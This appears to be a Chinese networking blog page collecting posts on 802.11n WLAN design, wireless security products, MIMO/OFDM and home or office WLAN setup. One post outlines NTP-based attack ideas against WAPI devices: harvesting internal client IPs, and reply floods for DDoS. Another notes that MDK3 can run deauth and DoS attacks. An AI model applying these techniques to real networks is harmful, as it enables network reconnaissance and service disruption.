◆回程能力:一个完全使用11n的AP可能产生比11a/g更大的流量。当需要更多的吞吐量时,可检测10/100以太网交换机和回程链路来升级以太网。

不管IP包如何在网络中流动,当他们到一个AP,就会被打包到11n帧中通过无线电传送。这儿,RF网络很明显需要设计来满足无线覆盖范围,吞吐量和程序的需求。

◆波段选择:如果可以,2.4GHz波段只给11g客户端使用;5GHz的一部分给11a客户端,一部分给新的11n客户端。这样操作可以减少干扰并且承载更大吞吐量(包括40MHz绑定信道)但是需要购买只有双波段的11n客户端。

◆信道部署:分配5GHz信道以满足不同程序的需求。比如,分配静态20MHz UNII-1信道给语音,给手机一个可靠的扫描列表。分配UNII-2/2e信道只给数据和可以容许动态频率选择的文件传输程序。绑定5GHz信道给需要承载高吞吐量的程序,比如HD视频。千万别绑定2.4GHz信道。

◆AP置入:早期的AP经常是凭经验放置,但是多路径导致11n蜂窝形成缺口并且随着时间而变化。让无线局域网规划师来估计11n AP数量以及如何放置来满足设计目标。为求最佳效果,要考虑建筑物对RF的影响。为了使你的计划跟得上发展,用基于5GHz的双波段AP来代替2.4GHz蜂窝。可以考虑定向天线来有效地填补覆盖上的缺口像长走廊或楼梯井。

◆设计目标:要让AP方案一直满足应用感知目标。比如,一般建议将10%到20%蜂窝重叠的最小信号强度——67 dBm用做语音。当选择蜂窝大小时,考虑到大蜂窝可最小化漫游——适合延时敏感的程序,但是小蜂窝适合高密集的地方如教室。即便是用自动配置的AP发射功率时,选择最大的来匹配最弱(通常为传统)客户端的发射功率。

虽然专家们议论了11n现场勘测的好处,但是测量拥护者建议在部署后期来测量其符合802.11n设计最佳实践。结合下行和上行链路,有效地测量技术也可以用在11n上。最后,必须测量真实客户端设备上的应用程序性能,因为802.11n的客户端非常广泛,根据用户使用经验,信号强度不一定总是可信任的。
类别:Wireless N.T | Tags: , , | 0 条评论, 412 次阅读
Jan
24
2011
802.11n可实现多要求的移动应用部署,同时它也是一个成熟的里程碑,很多客户乐于大规模地部署无线网络,甚至来替换以太网(Ethernet)。这种扩张大大增加了无线安全及无线安全服务对业务的重要性。VAR(增值经销商)和系统集成商可以通过提供更有效且更具规模的WLAN安全解决方案,包括基于云的服务来很好地利用这一市场需求。

802.11n安全的可用性

由于WLAN会争夺有限的未授权频谱,无线电射频(RF)干扰的减少对于确保可用性以及减少拒绝服务事件来说非常重要。现在,我们不讨论信号强弱问题,而是寻找使用率较高的频率,从而避免其被完全占用。免费的"stumblers"(计算机测试软件)可以让我们更加轻松地观测当前被占用的Wi-Fi频道情况,但很少有客户知道如何使用RF频谱分析仪。这就提供了许多的市场机遇,大大带动了例如Fluke AnalyzeAir、Metageek Wi-Spy、或Wi-Fi Sleuth等移动频谱分析仪的使用。

RF干扰无时无刻不在变化,但是,大多数不希望系统出现停机状况的客户也许会倾向于购买RF频谱分析仪,然后找VAR(增值经销商)来培训。但是例如来自Aruba, Cisco, Meru及Motorola的有些新产品,已经建立了一种可选择的交付模式:销售带有频谱分析功能的无线AP。云服务,甚至可以通过这些AP设备向供应商运营服务器做出有关RF的报表,诸如Meru的 E(z)RF Spectrum Manager 或Cisco的 MSE CleanAir Technology。

无线安全服务:控制WLAN访问

新802.11n设备集合了诸如802.11a/g设备——WPA2这种长距离Wi-Fi认证设备的安全功能。但是,当802.11n设备配置较陈旧,选项较弱(诸如WPA-TKIP 或 WEP)时,802.11n设备就无法达到较高的吞吐量(>54 Mbps)。此外,随着各企业组织逐渐大规模地在网络中实施无线覆盖访问,他们对未授权的无线网络使用情况越来越敏感。因此,通常认为升级802.11n是提供并加强WLAN安全的最好方式。

客户期望WPA2-PSK和 WPA2-802.1X能够被纳入WLAN基础架构。但经销商可通过提供互为补充的认证和网络访问控制产品来实现客户的期望。例如,AP设备和控制器可执行802.1X认证,但是一个802.1X-capable RADIUS服务器需要完整的事件描述。VAR们长期出售RADIUS服务器,诸如Cisco的ACS或Juniper的SBR,但是远程办公室和SMB或许不需要现场RADIUS服务器或员工来做支持。这一空白市场也许会由基于云的802.1X认证服务来填补。

网络访问控制存在着更有利的机遇。NAC产品与802.1X及RADIUS相吻合,增加的预连接扫描机制可确保Wi-Fi客户端的合规性,并能够拒绝或隔离不具合规性的客户端。但是对于不同的客户端来说将NAC整合到大型网络中也有不同的烦恼。WLAN升级是实现在一个简单孤立的地点部署NAC的机会,并能够帮助客户在体验NAC好处时感受更好的无线访问扩展体验。

无线入侵检测和防御

客户希望对流氓AP检测,如WPA2等可以嵌入到WLAN基础设施中。为了规避风险——尤其是在零售行业、医疗保险行业以及金融服务行业——客户可能会发现流氓扫描并不能够有效地检测及阻止广泛的威胁。这将为集成的或第三方无线入侵防御系统 (WIPS)的销售带来机会。

集成的WIPS更容易销售;将普通的AP设备转换为专用的传感器可用来监测无线通信中可能存在的威胁,包括未授权AP及攻击者进行DoS、探针或渗透WLAN。第三方WIPS(如 AirMagnet, AirTight)使用特制的传感器来检测并响应分散的的恶意客户端攻击。当今,大多数产品都有所突破,举例来说,Motorola AirDefense就可以部署在专用的Motorola AP当中。VAR可能希望通过部署若干个WIPS来满足不同WLAN供应商及多样化的客户需求。

从传统上来说,VAR已经销售过第三方WIPS服务器应用程序和传感器,或集成的WIPS软件,安装在WLAN控制器或管理应用程序中。基于云的WIPS最为吸引人的是购买之前的试用成本较低,或者说它是一种永久的解决方案:把WLAN划分为数百个小型WLAN来监测(如,零售行业)。

802.11n安全威胁的调查与调整

无论WLAN控制器是否报告无线安全事件,一个集成的WIPS或第三方WIPS,都会在无线侧检测时被发现,WLAN运营商需要取证工具(forensic tools)和专门的技术来评估事件的影响水平。WIPS能够提供实时的Wi-Fi设备踪迹,历史定位以及详细的事件日志说明。专用的WIPS传感器通常可以被装在数据包捕获模式中来记录进行中的攻击。

在某些调查中,移动Wi-Fi 数据包捕获和分析工具都是不可或缺的。一些客户都比较乐于使用免费的,或开源工具,如WireShark 或Airodump-NG。而其他客户则倾向于购买商用Wi-Fi流量分析工具,这样在大型WLAN中可以节省不少时间,同时还能得到更专业的洞察力。VAR通常会销售一些分析工具,如AirMagnet Analyzer 、WildPackets OmniPeek,用于WLAN故障排除和诊断,这些工具同样可以被安全人员所用。商业机遇同样为销售新型易用的Wi-Fi分析仪敞开了大门,因为这样的销售方式更加简单,也更能够迎合第一线的员工使用。

最后,VAR和系统集成商可能需要考虑提供更主动的无线安全服务和产品。例如,VAR可以按照Motorola AirDefense Wireless Vulnerability Assessment 模块的方式来销售Wi-Fi vulnerability assessment offerings (按照软件模块或云服务来销售)。系统集成商也可以在使用有效结论时,结合免费工具如 BackTrack4,寻找其自身的Wi-Fi深入测试服务方式。

无线安全服务——永无止境

虽然802.11n 引发了WLAN升级和扩容,并希望能够刺激无线安全市场,但其结果并不是短期内就能够看到的。安全性问题对客户来说并非一次性就能永久解决的。它是一个循序渐进的过程,它需要对新威胁和漏洞保持持久的警戒。这是VAR和系统集成商不断的收入来源。
类别:Wireless N.T | Tags: , , , | 0 条评论, 431 次阅读
Jan
24
2011
今天看了一篇文章《攻击WAPI无线认证设备的一个思路》觉得不错,特分享下!

全文地址:http://bigpack.blogbus.com/logs/100304856.html
引用文章:
     我们都知道,国内WAPI无线认证 是为运营级的通信运营商设计开发的。通信运营商要对基站工作的切换、漫游等都需要精确的时间控制,因此时钟同步问题对于移动通信的重要性不言而喻。而 WAPI 恰恰是为全国漫游的无线网络准备的。所以,也许其它手段对于 WAPI 设备来说并不足以受到严重危害,但特定的针对NTP服务的攻击,对于 WAPI 设备却是可能造成严重不良影响的手段之一。
      NTP 协议全称网络时间协议( Network Time Procotol )属于应用层协议(基于 UDP 传输,使用的端口号为 123 ),用来同步网络中分布式时间服务器和客户端之间的时间,使网络中的设备提供基于统一时间的应用成为可能。它的目的是在国际互联网上传递统一、标准的时间。 NTP 的具体实现方案是在网络上指定若干时钟源网站,为用户提供授时服务,并且这些网站间应该能够相互比对,提高准确度。其中,作为时间服务器和客户端都是相对的。一般来说,提供时间标准的设备为时间服务器,接收时间服务的设备为时间客户端。设备运行 NTP 之后,通过交换 NTP 报文,既可以作为时间服务器提供时间标准,又可以作为时间客户端接收时间服务。下面给出几个攻击思路,(PS: 对应的英文是自己想的,应该符合安全行业定义,大家凑合看吧)
类型1、 NTP Client Infomation Disclosure Attack(NTP 客户端信息泄露攻击)
     在默认情况下, NTP 服务器允许用户查询更多的资料。比如使用特定的诊断工具就可以获得从 NTP 服务器上进行时间更新的最近 600 个客户端 IP 地址。换句话说,就是使用一个请求方式,你就可以得到一个中型网络中的所有IP地址。若是有一个NTP服务器被放置在 DMZ 中,则外部攻击 者将可能获得内部网络的全部IP地址。
     为了方便大家理解,举个简单的例子,我先在一个中小型企业内部网络环境中搭建了一台 NTP 服务器提供 NTP 服务。如下图 所示,通过一个改进的Python脚本, 成功地 获取到了从该NTP服务器上进行更新的全部客户端记 录。这有什么意义?嘿嘿,自己想想。
点击在新窗口中浏览此图片
类型2、 NTP Reply Flood Attack(NTP 特殊回复报文洪水/DDOS攻击)
如下图 所示为针对 日本福冈大学 NTP 的发包测试,目标 NTP 完美地回复了 500 多条客户端更新数据。通过使用数量庞大的客户端配以特殊的算法不间断地重复发送测试报文,即可在单位时间内使得 NTP 服务达到一个请求处理的峰值,从而引发 CPU 过载、服务点击在新窗口中浏览此图片
其它还有NTP欺 骗攻击、时间延时攻击等等.
类别:Wireless N.T | Tags: , , | 0 条评论, 772 次阅读
Jan
21
2011
802.11n协议

新兴的 802.11n 标准具有高达 600 Mbps 的速率,是下一代的无线网络技术,可提供支持对带宽最为敏感的应用所需的速率、范围和可靠性。802.11n 结合了多种技术,其中包括 Spatial Multiplexing MIMO (Multi-In, Multi-Out) (空间多路复用多入多出)、20和 40MHz 信道和双频带 (2.4 GHz 和5 GHz),以便形成很高的速率,同时又能与以前的 IEEE 802.11b/g 设备通信。

多入多出(MIMO)或多发多收天线(MTMRA)技术是无线移动通信领域智能天线技术的重大突破。该技术能在不增加带宽的情况下成倍地提高通信系统的容量和频谱利用率,是新一代移动通信系统必须采用的关键技术。


802.11n技术MIMO和OFDM介绍

802.11n专注于高吞吐量的研究,计划将无线局域网的传输速率从802.11a和802.11g的54Mbps增加至108Mbps以上,最高速率可达320Mbps甚至500Mbps。这样高的速率当然要有技术支撑,而OFDM技术、MIMO(多入多出)技术正是关键。

OFDM技术是多载波调制(Multi-CarrierModulation,MCM)的一种,它曾经在802.11g标准中被采用。其核心是将信道分成许多进行窄频调制和传输正交子信道,并使每个子信道上的信号频宽小于信道的相关频宽,用以减少各个载波之间的相互干扰,同时提高频谱的利用率的技术。

OFDM还通过使用不同数量的子信道来实现上行和下行的非对称性传输。不过OFDM技术易受频率偏差的影响,存在较高的峰值平均功率比(PAR),不过可以通过时空编码、分集、干扰抑制以及智能天线技术,最大程度地提高物理层的可靠性,802.11g中虽也采用有相似技术,但相比802.11n中与MIMO技术的结合,自然逊色不少。

802.11n技术阵营合作发展

802.11n标准上有两大技术阵营,即WWiSE(World Wide Spectrum Efficiency)联盟和TGn Sync联盟,目前,802.11n工作组已经向前发展并采纳了一个由扩展无线联盟(EWC)整合的 组合方案,该扩展无线联盟(EWC)是由Broadcom,Intel和其他Wi-Fi供应商领导的行业组织。802.11n 1.0版草案是两方面的方案的有力结合 ,已经被IEEE采纳,现在正在被这个工作组为最终的采用而进行仔细的检查。

其中WWiSE获得了德州仪器、Broadcom、 Conexant、 STMicro、 Airgo和Bermai的支持,而此前曾提交自有标准的摩托罗拉也加入了这一阵营 ;TGn Sync的支持者则包括英特尔、Atheros、Agere、英飞凌、思科、高通、北电网络、三菱、索尼、松下、飞利浦、三星、三洋和东芝。 WWiSE以目前获得全球采用的20 MHz通道格式为基础,世界各地已有超过数千万部Wi-Fi装置正在使用此格式,这种方法不但确保现有Wi-Fi产品 获得支持,还可以改善Wi-Fi网络在指定频带内的工作效能。除此之外,联盟厂商也代表了组成Wi-Fi市场的半导体供应和消费领域重要交集, 这将在发展厂商和最终产品制造商之间建立起坚强的合作关系。

就技术层面而言,WWiSE建议案标示着802.11实作功能的重大进步,主要特点包括:

强制使用已经核准、现已存在且全球适用的20MHz Wi-Fi通道宽度,确保它在任何电信法规要求下都能立即使用和布署。

更强的MIMO-OFDM技术,它是在2×2组态配置和一个20 MHz通道的最低要求下达到135 Mbps最大数据速率、进而降低实作成本的关键。这种 技术还能大幅改善简单的天线延伸或信道汇整技术。

利用4×4 MIMO架构和40 MHz通道宽度(只要主管单位允许)实现的540 Mbps最高数据速率,它能替未来的装置和应用提供持续发展的蓝图。

强制模式提供与5 GHz和2.4 GHz频带内现有Wi-Fi装置的向后兼容性与互用性,确保已安装的设备仍能获得强大支持。

先进的FEC编码功能帮助实现最大覆盖率和联机距离,它适用于所有的MIMO组态和通道带宽。

而TGn Sync联盟主要是采用两条MIMO天线,与40MHz信道协同使用,创造出能提供250Mbps带宽和可用吞吐量理论值为175Mbps的器件。WWiSE的 会员则提出,这将减少可用非重叠802.11信道的数量,在一些国家属于非法,例如日本。相反,该组织提议的技术使用四条MIMO天线,同时保 持目前802.11定义的20MHz信道。这种方法据称频谱效率更高,而且受到的管制障碍较少。802.11n的技术优势
802.11n专注于高吞吐量的研究,计划将WLAN的传输速率从802.11a和802.11g的54Mbps增加至108Mbps以上,最高速率可达320Mbps甚至500Mbps。这样高的速率当然要有技术支撑,而OFDM技术、MIMO(多入多出)技术等正是关键。

OFDM技术是MCM(Multi-Carrier Modulation,多载波调制)的一种,曾经在802.11g标准中采用。其核心是将信道分成许多进行窄带调制和传输正交子信道,并使每个子信道上的信号带宽小于信道的相关带宽,用以减少各个载波之间的相互干扰,同时提高频谱的利用率的技术。OFDM还通过使用不同数量的子信道来实现上行和下行的非对称性传输。不过OFDM技术易受频率偏差的影响,存在较高的峰值平均功率比(PAR),不过可以通过时空编码、分集、干扰抑制以及智能天线技术,最大程度地提高物理层的可靠性,802.11g中虽也采用有相似技术,但相比802.11n中与MIMO技术的结合,自然逊色不少。

MIMO(多入多出)技术是无线通信领域智能天线技术的重大突破,能在不增加带宽的情况下成倍地提高通信系统的容量和频谱利用率。MIMO系统在发射端和接收端均采用多天线(或阵列天线)和多通道。传输信息流S(k)经过空时编码形成N个信息子流Ci(k),i=1,……,N。这N个子流由N个天线发射出去,经空间信道后由M个接收天线接收。多天线接收机利用先进的空时编码处理能够分开并解码这些数据子流,这样,MIMO系统可以创造多个并行空间信道,解决了带宽共享的问题。802.11n天线数量可以支持到3*3,比802.11g的3增加了3倍。

将MIMO与OFDM技术相结合,就产生了MIMO OFDM技术,它通过在OFDM传输系统中采用阵列天线实现空间分集,提高了信号质量,并增加了多径的容限,使无线网络的有效传输速率有质的提升。

而为了提升整个网络的吞吐量,802.11n还对802.11标准的单一MAC层协议进行了优化,改变了数据帧结构,增加了净负载所占的比重,减少管理检错所占的字节数大大提升了网络的吞吐量。在天线上,智能天线技术的应用也解决了802.11n的传输覆盖范围问题。通过多组独立天线组成的天线阵列系统,动态地调整波束的方向,802.11n保证让用户接收到稳定的信号,并减少其它噪音信号的干扰,使无线网络的传输距离能够增加到几公里,移动性大大增强。

兼容性方面,802.11n采用软件无线电技术解决不同标准采用不同的工作频段、不同的调制方式,造成系统间难以互通,移动性差的问题。软件无线电是一个完全可编程的硬件平台,所有的应用都通过在该平台上的软件编程实现,换句话说,就是不同系统的基站和移动终端都可以由建立在相同硬件基础上的不同软件实现。软件无线电技术将根本改变网络结构,实现无线局域网与无线广域网融合并能容纳各种标准、协议,提供更为开放的接口,最终大大增加网络的灵活性。另外,802.11n工作模式包含2.4GHz和5.8GHz两个工作频段,保障了与以往的802.11a/b/g标准兼容,极大的保护了用户的投资。
类别:Wireless N.T | Tags: , , | 0 条评论, 649 次阅读
Jan
17
2011
由于802.11n技术所实现的速度和可靠性,许多公司正开始使用带宽更大的无线LAN来支持新的移动服务。但是这个变化需要进行更复杂和更可靠的WLAN测试,以验证网络的安全性、连接性和性能。

公司可以不再需要使用耗费人力的工具来检查信号强度、服务器可访问性和Wi-Fi漏洞。测试在地理位置上分散的整个企业网络的成百上千的接入端(AP)和无数的客户端需要使用更高效的自动化工具和方法。

在许多早期的Wi-Fi部署中,安全性意味着检查整个建筑物或园区,监听陌生信号,以便发现未授权的恶意AP。这不仅极为低效,而且经常会“阻碍”许多识别错误的AP,也会忽视其他的一些威胁,如配置错误和操作不当的客户端。

使用具有无线入侵防御系统的AP进行全天监控

随着Wi-Fi越来越流行,许多AP经过更新后能够监听频道内或频道外的流氓信号。另外专门的Wireless Intrusion Prevention Systems (WIPS),也可用于全天监控无线攻击或违规行为,以及响应临时阻挡和发现嫌疑的流氓信号。

然而,这两个方法已经开始融合到一起。许多企业AP现在能够在需要时变成专职WIPS探测器,而且有几个AP供应商也提供了专用的WIPS设备。现在争论的重点越来越不在于扫描的频率,24/7是依赖无线的企业必须要求实现的。相反,合理的安全任务和符合规范要求则占据了核心地位。

集中的WLAN评估工具保证了规范性

为了符合像PCI DSS或Federal Information Security Management Act (FISMA)这样的规范,组织必须证明安全控制的有效性,并记录嫌疑违反规范的情况。现在,许多商业WIPS和一些WLAN管理器能够根据流行的行业规范产生封闭的规范报告,但是仍然需要持续地评估这些安全性控制和政策。

许多公司都雇佣第三方审计人员到现场执行评估;例如,要在一个商店中验证PCI DSS规范。然而,在进行这个审计之前,我们最好先测试一些有问题的地方,然后在它们暴露之前修复 这些问题。理想情况下,这些自我评估应该定期进行,而且不会消耗太多的员工时间,不需要太多的现场调查费用。

这正是集中评估工具发挥作用的地方。例如,AirTight Networks使用基于云的WIPS与上述探测器通信来实现每季度的PCI扫描和修复服务。这些探测器会监听邻近的流量,并探测Cardholder Data Environments (CDEs)的无线漏洞,从而产生PCI DSS 1.2规范所要求的月扫描报告(至少)。

对于那些已经部署了WIPS的公司而言,像Motorola AirDefense提供的无线漏洞评估模块等插件能够将部署的探测器变成远程测试引擎,它们能够周期性地连接AP,探测暴露的端口和URL,并生成记录结果的报告。

自动的远程安全性扫描,不管是由本身的WIPS执行,或者是云服务实现,都能够实现廉价的常规自我评估。然而,它们并不能替代不定期的人工现场渗透测试。

非自动化WLAN测试——渗透测试

查找可能淹没客户端、AP和WLAN管理器的盲点、错误和新攻击是WLAN测试的重要组成部分。然而,这种无线测试还没有实现完全的自动化。

例如,MDK3是一个命令行工具,它可用于猜测隐藏的SSID和MAC ACL,寻找客户端的认证漏洞,并发送802.11 Beacon、Deauth和TKIP MIC DoS攻击。审计人员可以使用MDK3方便地在不同的位置发起这些渗透测试,如办公室内部和外部。然而,诸如MDK3等工具绝不应该在工作时间内对生产环境WLAN执行测试,因为生产使用需要人工指引和结果解释。

集中的渗透测试工具经常可用于发现影响WLAN安全性的较上层的系统漏洞。例如,Metasploit脚本能够尝试许多不同的有线和无线LAN应用程序。如果要对一个大型网络执行更高效的Metasploit测试,我们可以考虑Rapid7的Metasploit Pro,它可以从一个中央控制台执行多层次的远程渗透测试。
类别:Wireless N.T | Tags: , | 0 条评论, 440 次阅读
Jan
17
2011
  
  如今任何人部署和设计无线局域网都应该会使用802.11n无线接入点。这不仅仅是价格可以和11a/g相匹敌,而且由于11n的可及范围使得室内空间需要的无线接入点更少。虽然一些电池供电的设备还没销售出去,但是大部分新客户也还是选择了11n产品。总之,除非是商业需要否则肯定买11n产品。
  当你要设计802.11n无线局域网时,最佳实践是难以捉摸的:
  ◆信道结构:几乎所有的产品都会用多信道来创建微蜂窝,但至少会有两家供应商使用一个单信道来创建一个大的RF层。很明显,当用户移动时后者会减少漫游时间,但权衡取舍仍存在着激烈的争议。
  ◆分发控制:在集中控制的无线局域网中802.11n显示出了低效和瓶颈。小控制器难于应付高吞吐量,向一个控制器打开所有隧道会导致延时,并且扩展端到端Qos会很难。为得到最佳效果,当分配实时Qos和安全控制任务给AP时需要集中化管理和可见性。
  ◆回程能力:一个完全使用11n的AP可能产生比11a/g更大的流量。当需要更多的吞吐量时,可检测10/100以太网交换机和回程链路来升级以太网。
  不管IP包如何在网络中流动,当他们到一个AP,就会被打包到11n帧中通过无线电传送。这儿,RF网络很明显需要设计来满足无线覆盖范围,吞吐量和程序的需求。
  ◆波段选择:如果可以,2.4GHz波段只给11g客户端使用;5GHz的一部分给11a客户端,一部分给新的11n客户端。这样操作可以减少干扰并且承载更大吞吐量(包括40MHz绑定信道)但是需要购买只有双波段的11n客户端。
  ◆信道部署:分配5GHz信道以满足不同程序的需求。比如,分配静态20MHz UNII-1信道给语音,给手机一个可靠的扫描列表。分配UNII-2/2e信道只给数据和可以容许动态频率选择的文件传输程序。绑定5GHz信道给需要承载高吞吐量的程序,比如HD视频。千万别绑定2.4GHz信道。
  ◆AP置入:早期的AP经常是凭经验放置,但是多路径导致11n蜂窝形成缺口并且随着时间而变化。让无线局域网规划师来估计11n AP数量以及如何放置来满足设计目标。为求最佳效果,要考虑建筑物对RF的影响。为了使你的计划跟得上发展,用基于5GHz的双波段AP来代替2.4GHz蜂窝。可以考虑定向天线来有效地填补覆盖上的缺口像长走廊或楼梯井。
  ◆设计目标:要让AP方案一直满足应用感知目标。比如,一般建议将10%到20%蜂窝重叠的最小信号强度——67 dBm用做语音。当选择蜂窝大小时,考虑到大蜂窝可最小化漫游——适合延时敏感的程序,但是小蜂窝适合高密集的地方如教室。即便是用自动配置的AP发射功率时,选择最大的来匹配最弱(通常为传统)客户端的发射功率。
  虽然专家们议论了11n现场勘测的好处,但是测量拥护者建议在部署后期来测量其符合802.11n设计最佳实践。结合下行和上行链路,有效地测量技术也可以用在11n上。最后,必须测量真实客户端设备上的应用程序性能,因为802.11n的客户端非常广泛,根据用户使用经验,信号强度不一定总是可信任的。
类别:Wireless N.T | Tags: , | 0 条评论, 507 次阅读
Jan
7
2011
  
  无线局域网(WLAN)产业是当前整个数据通信领域发展最快的产业之一。因其具有灵活性、可移动性及较低的投资成本等优势,无线局域网解决方案 作为传统有线局域网络的补充和扩展,获得了家庭网络用户、中小型办公室用户、广大企业用户及电信运营商的青睐,得到了快速的应用。然而在整个无线局域网 中,却有着种种问题困扰着广大个人用户和企业用户。首先是该如何去组建无线局域网,这也是无线局域网中最基本的问题之一。具体来分,组建无线局域网包括组 建家庭无线局域网和组建企业无线局域网。下面让我们来看看。
  组建家庭无线局域网
  尽管现在很多家庭用户都选择了有线的方式来组建局域网,但同时也会受到种种限制,例如,布线会影响房间的整体设计,而且也不雅观等。通过家庭无 线局域网不仅可以解决线路布局,在实现有线网络所有功能的同时,还可以实现无线共享上网。凭借着种种优点和优势,越来越多的用户开始把注意力转移到了无线 局域网上,也越来越多的家庭用户开始组建无线局域网了,但对于新手而言却有着很多问题。下面我们将组建一个拥有两台电脑(台式机)的家庭无线局域网。
  1、选择组网方式
  家庭无线局域网的组网方式和有线局域网有一些区别,最简单、最便捷的方式就是选择对等网,即是以无线AP或无线路由器为中心(传统有线局域网使用HUB或交换机),其他计算机通过无线网卡、无线AP或无线路由器进行通信
  该组网方式具有安装方便、扩充性强、故障易排除等特点。另外,还有一种对等网方式不通过无线AP或无线路由器,直接通过无线网卡来实现数据传输。不过,对计算机之间的距离、网络设置要求较高,相对麻烦。
  2、硬件安装
  下面,我们以TP-LINK TL-WR245 1.0无线宽带路由器、TP-LINK TL-WN250 2.2无线网卡(PCI接口)为例。 关闭电脑,打开主机箱,将无线网卡插入主板闲置的PCI插槽中,重新启动。在重新进入Windows XP系统后,系统提示“发现新硬件”并试图自动安装网卡驱动程序,并会打开“找到新的硬件向导”对话框让用户进行手工安装。点击“自动安装软件”选项,将 随网卡附带的驱动程序盘插入光驱,并点击“下一步”按钮,这样就可以进行驱动程序的安装。点击“完成”按钮即可。打开“设备管理器”对话框,我们可以看到 “网络适配器”中已经有了安装的无线网卡。 在成功安装无线网卡之后,在Windows XP系统任务栏中会出现一个连接图标(在“网络连接”窗口中还会增加“无线网络连接”图标),右键点击该图标,选择“查看可用的无线连接”命令,在出现的 对话框中会显示搜索到的可用无线网络,选中该网络,点击“连接”按钮即可连接到该无线网络中。
  接着,在室内选择一个合适位置摆放无线路由器,接通电源即可。为了保证以后能无线上网,需要摆放在离Internet网络入口比较近的地方。另 外,我们需要注意无线路由器与安装了无线网卡计算机之间的距离,因为无线信号会受到距离、穿墙等性能影响,距离过长会影响接收信号和数据传输速度,最好保 证在30米以内。
  3、设置网络环境
  安装好硬件后,我们还需要分别给无线AP或无线路由器以及对应的无线客户端进行设置。
  (1)设置无线路由器
  在配置无线路由器之前,首先要认真阅读随产品附送的《用户手册》,从中了解到默认的管理IP地址以及访问密码。例如,我们这款无线路由器默认的 管理IP地址为192.168.1.1,访问密码为admin. 连接到无线网络后,打开IE浏览器,在地址框中输入192.168.1.1,再输入登录用户名和密码(用户名默认为空),点击“确定”按钮打开路由器设置 页面。然后在左侧窗口点击“基本设置”链接,在右侧的窗口中设置IP地址,默认为192.168.1.1;在“无线设置”选项组中保证选择“允许”,在 “SSID”选项中可以设置无线局域网的名称,在“频道”选项中选择默认的数字即可;在“WEP”选项中可以选择是否启用密钥,默认选择禁用。
  提示:SSID即Service Set Identifier,也可以缩写为ESSID,表示无线AP或无线路由的标识字符,其实就是无线局域网的名称。该标识主要用来区分不同的无线网络,最多可以由32个字符组成,例如,wireless.
  我们使用的这款无线宽带路由器支持DHCP服务器功能,通过DHCP服务器可以自动给无线局域网中的所有计算机自动分配IP地址,这样就不需要 手动设置IP地址,也避免出现IP地址冲突。具体的设置方法如下:同样,打开路由器设置页面,在左侧窗口中点击“DHCP设置”链接,然后在右侧窗口中的 “动态IP地址”选项中选择“允许”选项,表示为局域网启用 DHCP服务器。默认情况下“起始IP地址”为192.168.1.100,这样第一台连接到无线网络的计算机IP地址为192.168.1.100、第 二台是192.168.1.101……你还可以手动更改起始IP地址最后的数字,还可以设定用户数(默认50)。最后点击“应用”按钮。
  提示:通过启用无线路由器的DHCP服务器功能,在无线局域网中任何一台计算机的IP地址就需要设置为自动获取IP地址,让DHCP服务器自动分配IP地址。
  (2)无线客户端设置
  设置完无线路由器后,下面还需要对安装了无线网卡的客户端进行设置。
  在客户端计算机中,右键点击系统任务栏无线连接图标,选择“查看可用的无线连接”命令,在打开的对话框中点击“高级”按钮,在打开的对话框中点 击“无线网络配置”选项卡,点击“高级”按钮,在出现的对话框中选择“仅访问点(结构)网络”或“任何可用的网络(首选访问点)”选项,点击“关闭”按钮 即可。
  提示:在Windows 98/2000系统中不能进行无线网卡的配置,所以在安装完无线网卡后还需要安装随网卡附带的客户端软件,通过该软件来配置网络。
  另外,为了保证无线局域网中的计算机顺利实现共享、进行互访,应该统一局域网中的所有计算机的工作组名称。
  右键点击“我的电脑”,选择“属性”命令,打开“系统属性”对话框。点击“计算机名”选项卡,点击“更改”按钮,在出现的对话框中输入新的计算机名和工作组名称,输入完毕点击“确定”按钮。
  注意:网络环境中,必须保证工作组名称相同,例如,Workgroup,而每台计算机名则可以不同。
  重新启动计算机后,打开“网上邻居”,点击“网络任务”任务窗格中的“查看工作组计算机”链接就可以看到无线局域网中的其他计算机名称了。以 后,还可以在每一台计算机中设置共享文件夹,实现无线局域网中的文件的共享;设置共享打印机和传真机,实现无线局域网中的共享打印和传真等操作。
  组建办公无线局域网
  组建办公无线局域网与家庭无线局域网的组建差不多,不过,因为办公网络中通常拥有的计算机较多,所以对所实现的功能以及网络规划等方面要求也比 较高。下面,我们以拥有8台计算机的小型办公网络为例,其中包括3个办公室:经理办公室(2台)、财务室(1台)以及工作室(5台),Internet接 入采用以太网接入(10M)。
  1、组建前的准备
  对于这种规模的小型办公网络,采用无线路由器的对等网连接是比较适合的。另外,考虑到经理办公室和财务室等重要部门网络的稳定性,准备采用交换 机和无线路由器(TP-LINK TL-WR245 1.0)连接的方式 .这样,除了配备无线路由器外,我们还需要准备一台交换机(TP-LINK TL-R410)、至少4根网线,用于连接交换机和无线路由器、服务器、经理用笔记本电脑以及财务室计算机。还需要为工作室的每台笔记本电脑配备一块无线 网卡(如果已经内置就不需要了),考虑到USB无线网卡即插即用、安装方便、高速传输、无须供电等特点,全部采用USB无线网卡(TP-LINK TL-WN220M 2.0)与笔记本电脑连接。
  提示:出于成本以及兼容性考虑,在组建无线局域网时最好选择同一品牌的无线网络产品。
  2、安装网络设备
  在工作室中,首先需要给每台笔记本电脑安装USB无线网卡(假设全部安装的了Windows XP操作系统):将USB无线网卡和笔记本电脑的USB接口连接,Windows XP会自动提示发现新硬件,并打开“找到新的硬件向导”对话框。将随网卡附带的驱动程序盘插入光驱,选择“自动安装软件”选项,然后点击“下一步”按钮即 开始驱动程序的安装。这样,打开“网络连接”对话框就可以看到自动创建的“自动无线网络连接”。而且在系统“设备管理器”对话框中的“网络适配器”项中可 以看到已经安装的 USB无线网卡。
  接着,将TP-LINK TL-R410交换机的UpLink端口和进入办公网络的Internet接入口用网线连接,另外选择一个端口(UpLink旁边的端口除外)与TP- LINK TL-WR245 1.0无线宽带路由器的WAN端口连接,其他端口分别用网线和财务室、经理用计算机连接。因为该无线宽带路由器本身集成5口交换机,除了提供一个 10/100Mbps自适应WAN端口外,还提供4个10/100Mbps自适应LAN端口,选择其中的一个端口和服务器连接,并通过服务器对该无线路由 器进行管理。
  最后,分别接通交换机、无线路由器电源,该无线网络就可以正常工作了。
  3、设置网络环境
  在安装完网络设备后,我们还需要对无线AP或无线路由器、以及安装了无线网卡的计算机进行相应网络设置。
  (1)设置无线路由器
  通过无线路由器组建的局域网中,除了进行常见的基本设置、DHCP设置,还需要进行WAN连接类型以及访问控制等内容的设置。
